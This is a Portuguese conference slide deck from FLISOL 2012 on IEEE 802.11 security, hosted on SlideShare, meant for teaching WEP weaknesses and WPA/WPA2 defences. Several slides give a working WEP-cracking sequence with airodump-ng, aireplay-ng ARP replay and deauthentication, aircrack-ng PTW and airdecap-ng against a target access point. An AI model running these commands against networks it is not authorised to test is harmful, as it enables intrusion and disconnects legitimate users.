Apresentação flisol2012 prof_joséquaresmafilho

449 views

Published on

0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
449
On SlideShare
0
From Embeds
0
Number of Embeds
6
Actions
Shares
0
Downloads
7
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Apresentação flisol2012 prof_joséquaresmafilho

  1. 1. 30/04/2012 • José Quaresma Filho • Técnologo em Redes de Computadores • Especialista em Segurança da Informação • Experiência Profissional (IFPB e Faculdade iDEZ) Atualmente Professor do CST em Redes de Computadores Disciplinas : Segurança de Redes, Práticas em Segurança de Redes, Redes Sem Fio e Redes Móveis Redes Convergentes e Gerência e Desempenho de Redes de Computadores. Coordenador do CST em Redes de Computadores – Faculdade iDEZ Coordenador da Pós-Graduação em Segurança da Informação –Segurança em Redes Sem Fio IEEE 802.11 Faculdade iDEZ Professor da Pós-Graduação (Especialização) em Segurança da Professor: José Quaresma Filho Informação na Faculdade iDEZ e na FIP/I2P Disciplinas: Criptografia e Protocolos Seguros, Segurança da Informação na Realidade dos Negócios, Segurança nas Tecnologias de Trasnmissão. 2009 a 2011 - Administrador de Redes da FUNESC 1993 a 2009 - Administrador de Redes da FAC Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho ENTRE EM CONTATO jose.filho@faculdadeidez.edu.br zefilho@ifpb.edu.br (83) 8852-2274 (83) 9924-8516 Se preferir… Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho ROTEIRO •Introdução •Conceitos de redes Wi-Fi •História do padrão IEEE 802.11 •Principais vulnerabilidades •Principais ataques •Soluções Propostas • WPA (WEP2) e IEEE 802.11i (WPA2) Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho 1
  2. 2. 30/04/2012• INTRODUÇÃO: – Definindo o escopo• Redes Sem Fio – Infravermelho IEEE 802.11 – Bluetooth (IEEE 802.15.1) – Zigbee (IEEE 802.15.4) – WI-FI (IEEE 802.11) – WiMAX (IEEE 802.16) Wi-Fi Alliance – Redes Celulares Wi-Fi (Wireless Fidelity) Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho IEEE 802.11 O primeiro padrão aprovado: IEEE std 802.11-1997 1990 Professor: José Gomes Quaresma Filho Substituída pela IEEE Std 802,11- 2007 (Revisão de IEEE Std 802,11- 1.999) Professor: José Gomes Quaresma Filho IEEE std 802.11-1999 IEEE 802.11a Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho 2
  3. 3. 30/04/2012 IEEE 802.11b IEEE 802.11g Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma FilhoIEEE std 802.11i-2004 IEEE std 802.11-2007 Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho IEEE std 802.11n CRONOLOGIA 1997 1997 1999 1999 2004 2009 FHSS DSSS HR/DSSS OFDM OFDM MIMO 802.11 802.11 802.11b 802.11a 802.11g 802.11n (2Mbps) (2Mbps) (11Mbps) (54Mbps) (54Mbps) (108Mbps) 2,4 GHz 5,0 GHz 2,4 GHz 2,4 e 5,0 ISM UNII Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho 3
  4. 4. 30/04/2012 Faixa UNII (5GHz) root@root:~ # iwlist wlan0 freq wlan0 14 channels in total; available frequences Channel 01 : 2.412 GHz Channel 02 : 2.417 GHz Channel 03 : 2.422 GHz Channel 04 : 2.427 GHz Channel 05 : 2.432 GHz Channel 06 : 2.437 GHz Channel 07 : 2.442 GHz Channel 08 : 2.447 GHz Channel 09 : 2.452 GHz Faixa ISM (2,4GHz) Channel 10 : 2.457 GHz Channel 11 : 2.462 GHz Channel 12 : 2.467 GHz Channel 13 : 2.472 GHz Channel 14 : 2.484 GHz root@root:~ # Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho MODELOS DE REFERÊNCIA APLICAÇÃOAPRESENTAÇÃO SESSÃO APLICAÇÃOTRANSPORTE TRANSPORTE REDE INTER-REDES Subcamada LLC ENLACE Subcamada MAC ACESSO À REDE FÏSICA FÍSICA OSI IEEE 802 TCP/IP Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho CONTROLE DE ACESSO • Identificação • Autenticação • Autorização Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho 4
  5. 5. 30/04/2012 Antes de começar Descubra o chipset da sua placa de rede wireless #lspci | grep Network Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho • Modos de operação das placas wireless – Managed (gerenciado) – Ad-hoc – Monitor (RFMON) – Master (mestre = AP)http://www.backtrack-linux.org/wiki/index.php/Wireless_Drivers#Tested_and_working_cards Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho • iwconfig • iwconfig wlan0 • iwconfig wlan0 mode monitor • airmon-ng start wlan0 Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho 5
  6. 6. 30/04/2012Ocultando o ESSID Cliente não “enxerga” a rede Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho#airodump-ng wlan0 Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho WEP Wired Equivalent Privacy Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho 6
  7. 7. 30/04/2012 Principais características Principais problemas• Usa PSK (Pre Shared Key) • O IV trafega em texto plano• Chaves pré-compartilhadas nas Estações • Com 24 bits (3 bytes) o IV tem 224=16,8 milhões de possibilidades (STAs) e Access Points (Aps) • Numa rede com tráfego de 11 Mpbs – IEEE• Chave WEP 64: IV (24 bits) + Key (40 bits) 802.11b levaria aproximadamente 9h para os IVs• Chave WEP 128: IV (24 bits) + Key (104 bits) começarem a se repetir.• Usa o algoritmo RC4 para cifrar os pacotes • Não existe autenticação do usuário • No modo Open System a autenticação se baseia• O IEEE não determinou uma política para a apenas no SSID troca das chaves • Não há mecanismos para autenticar o AP Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho Principais ataques ao WEP • 2001 - Fluhrer, Mantin e Shamir (estatística) • 2004 – Chopchop (estatística) • 2007 - Pychkine, Tews e Weinmann (PTW força bruta) #aircrack-ng #airmon-ng #aireplay-ng #airodump-ng #airdecap-ng #aircrack-ng Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho Colocando a interface em modo monitor Explorando as vulnerabilidades do WEP Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho 7
  8. 8. 30/04/2012Mas será que alguém ainda usa WEP?? # airodump-ng mon0 Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho # airodump-ng --bssid 00:14:D1:49:EA:AE --channel 11 --write captura mon0 Onde: • --bssid : MAC address do AP alvo. • --channel: canal utilizado. • --write: arquivo onde os dados serão gravados. Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho E se o número de pacotes for insuficiente? • Rede com baixo tráfego • Pouco tempo de captura Dados = O • Troca dinâmica da chave WEP Estações conectadas MAC do AP Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho 8
  9. 9. 30/04/2012 Injetando pacotes na rede Testando a interface # aireplay-ng --test mon0 12:39:40 Trying broadcast probe requests… 12:39:40 Injection is working! 12:39:42 Found 1 AP 12:39:42 Trying direct probe requests… 12:39:42 00:14:D1:49:EA:AE – channel 11 – XXXXXX 12:39:42 Ping (min/avg/max): 1,671 ms/6,987ms/11,453ms Power:- 15,76 12:39:42 30/30: 100% Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho# aireplay-ng --arpreplay -b 00:14:D1:49:EA:AE -h 00:25:CF:89:22:DC mon0Onde:• -b : MAC address do AP alvo.• -h: MAC address do cliente conectado que será “spoofado”. Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho Tempo = 4 min Dados = 99504 pacotes E se não tiver tráfego ARP ? • Espera uma nova conexão • Força uma desconexão de um cliente #aireplay-ng --deauth 100 –h 00:25:CF:89:22:DC -b 00:14:D1:49:EA:AE mon0 Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho 9
  10. 10. 30/04/2012 Quebrando a senha # aircrack-ng -z -b 00:14:D1:49:EA:AE captura*.cap Obs: -z Ataque PTW Onde: • -b : MAC address do AP alvo. • captuta*.cap: arquivos onde foram armazenados os pacotes capturados Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho Depois de descobrir a senha o que eu faço?? #airdecap-ng –w KEY –b 00:14:D1:49:EA:AE captura*.cap Chave “secreta” Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho SOLUÇÕES TKIP – key mixing• WPA Personal (2002) – TKIP – geração de chaves aleatórias - função de key mixing – IV de 48 bits -2,8 x 1014 possibilidades – Chave PSK com mínimo de 64 bits – Chave utilizada pelo RC4 de 128 bits – Algoritmo de verificação de integridade do frame - MIC Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho 10
  11. 11. 30/04/2012WPA Enterprise • IEEE 802.11i - 2004• 802.1x – padrão do IEEE para Controle de acesso – Robust Security Networks (RSN): – Funciona em conjunto com Extensible Authentication Protocol (EAP) ou EAPOL – over LAN – Um mecanismo de privacidade de dados, ou seja,• Servidor de Autenticação - Radius um modelo de criptografia de dados utilizando um certo algoritmo. Podem ser utilizados o TKIP com o algoritmo RC4 ou o CCMP com o algoritmo AES – Utilização do IEEE 802.1X para controle de acesso e o gerenciamento de chaves do mesmo IEEE 802.1X para fornecer as chaves ao ponto de acesso e usuário. Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho MUITO OBRIGADO !! • Estabelecimento de um canal seguro entre o ponto de acesso e o servidor de autenticação. • Localizar a rede, negociar os algoritmos de criptografia e associar o algoritmo à rede. • Realizar a autenticação 802.1X com o servidor de autenticação. • Autenticação mutua e estabelecimento das chaves aos pares (para o ponto de acesso e usuário). • Estabelecimento das chaves criptográficas. Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho PERGUNTAS Professor: José Gomes Quaresma Filho 11

×